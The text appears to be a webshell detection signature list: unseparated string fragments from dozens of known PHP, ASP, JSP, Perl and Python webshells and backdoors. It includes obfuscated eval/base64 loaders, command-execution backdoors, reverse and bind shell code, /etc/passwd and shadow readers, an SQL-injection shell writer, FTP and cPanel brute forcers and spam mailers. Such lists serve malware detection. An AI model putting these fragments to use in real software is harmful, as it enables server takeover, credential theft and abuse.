security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font 